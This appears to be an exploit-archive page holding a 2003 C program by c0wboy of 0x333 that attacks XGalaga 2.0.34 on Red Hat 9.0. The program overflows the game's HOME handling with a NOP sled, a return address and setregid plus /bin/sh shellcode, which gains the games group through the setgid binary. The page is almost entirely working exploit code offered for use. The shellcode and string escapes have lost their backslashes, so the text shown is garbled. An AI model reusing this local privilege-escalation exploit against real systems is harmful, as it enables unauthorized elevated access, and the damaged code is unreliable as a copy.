XGalaga 2.0.34 local game exploit (Red Hat 9.0)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XGalaga 2.0.34 local game exploit (Red Hat 9.0)
# Published : 2003-07-31
# Author : c0wboy
# Previous Title : CDRDAO Local Root Exploit
# Next Title : IPSwitch IMail Server <= 8.1 Local Password Decryption Utility

/* 0x333xgalaga => XGalaga 2.0.34 local game exploit (Red Hat 9.0)
*
* tested against xgalaga-2.0.34-1.i386.rpm
* under Red Hat Linux 9.0
*
* - bug found by Steve Kemp
* - exploit coded by c0wboy @ 0x333
*
* (c) 0x333 Outsider Security Labs / www.0x333.org
*
*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>


#define BIN "/usr/X11R6/bin/xgalaga"
#define SIZE 264

#define RET 0xbffffe2c /* tested against Red Hat Linux 9.0 */
#define NOP 0x90


unsigned char shellcode[] =

/* setregid (20,20) shellcode */
"x31xc0x31xdbx31xc9xb3x14xb1x14xb0x47"
"xcdx80"

/* exec /bin/sh shellcode */

"x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
"x69x89xe3x52x53x89xe1x8dx42x0bxcdx80";


void banner (void);
void memret (char *, int, int, int);


void banner (void)
{
fprintf (stdout, "nn --- xgalaga local GAME exploit by c0wboy ---n");
fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---nn");
}


void memret (char *buffer, int ret, int size, int align)
{
int i;
int * ptr = (int *) (buffer + align);

for (i=0; i<size; i+=4)
*ptr++ = ret;

ptr = 0x0;
}


int main ()
{
int ret = RET;
char out[SIZE];

memret ((char *)out, ret, SIZE-1, 0);

memset ((char *)out, NOP, 33);
memcpy ((char *)out+33, shellcode, strlen(shellcode));

setenv ("HOME", out, 1);

banner ();
execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game
}

// www.Syue.com [2003-07-31]